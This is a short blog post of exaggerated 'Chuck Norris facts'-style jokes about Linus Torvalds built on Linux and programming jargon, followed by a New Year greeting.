Linus Torvalds runs Linux on his wristwatch and toster.

Linus Torvalds doesn't receive error messages.

There is no theory of probability, just a list of events that Linus Torvalds allows to occur.

Linus Torvalds does not sleep. He hacks.

Linus surfs the web using nothing but netcat.

Linus Torvalds can play 3D games in his head by interpreting the source code in real-time.

Linus made the red pill.

Linus Torvalds didn't learn from the University of Helsinki, the University of Helsinki learned from Linus Torvalds.

Linus Torvalds once developed a programming language so good that it makes python look like punch cards.

Linus Torvalds doesn't need to boot.

Linus is real, unless declared Integer.

Linus doesn't push the flush toilet button. He simply says "make clean".

Linus Torvalds has no dependencies.

Linus Torvalds takes one look at your desktop and knows which porn sites you visited. In the last ten years.

Linus can enrich himself simply by chowning your bank account. He does not do this because there is no challenge in it.

There are no man pages for Linus Torvalds, only god pages.

Linus Torvalds can do an infinite loop in five seconds... in his head.

Linus Torvalds doesn't wear glasses anymore not because he had laser eye surgery, but because he finally got his xorg.conf properly configured in his head.

Linus Torvalds can use a nice level lower than -20.

Linus Torvalds doesn't need to mount his drives.

Linus Torvalds doesn't debug.

Linus Torvalds can install Linux on a dead badger.

Linus Torvalds doesn't need backups. He just uploads his files and lets the world mirror them.

Linus Torvalds is taking over the world. Microsoft is just a diversion so that no one would suspect a mild mannered Finnish programmer.

Linus Torvalds already has Linux 3.0. He is just keeping it to himself to build suspense.

Linus Torvalds didn't design Linux to run on the 386. Intel designed the 386 to run Linux.

People pray to Jesus, but Jesus prays to Linus Torvalds.

Linus need not worry about Microsoft patent crap, he simply do `sudo mv /tmp/ms /dev/null`.

Linus Torvalds is more powerful than root.

If you could read Linus Torvald’s mind, you'd find that his stream of conciousness is entirely in binary.

Linus scared A and B away, so they had to make C.

Linus only has 2 buttons on his keyboard '1' and '0'

Linus’s kernel never panics.

01 January, 2008

Photoshop Session No.3



















And btw...Happy New Year everybody :)))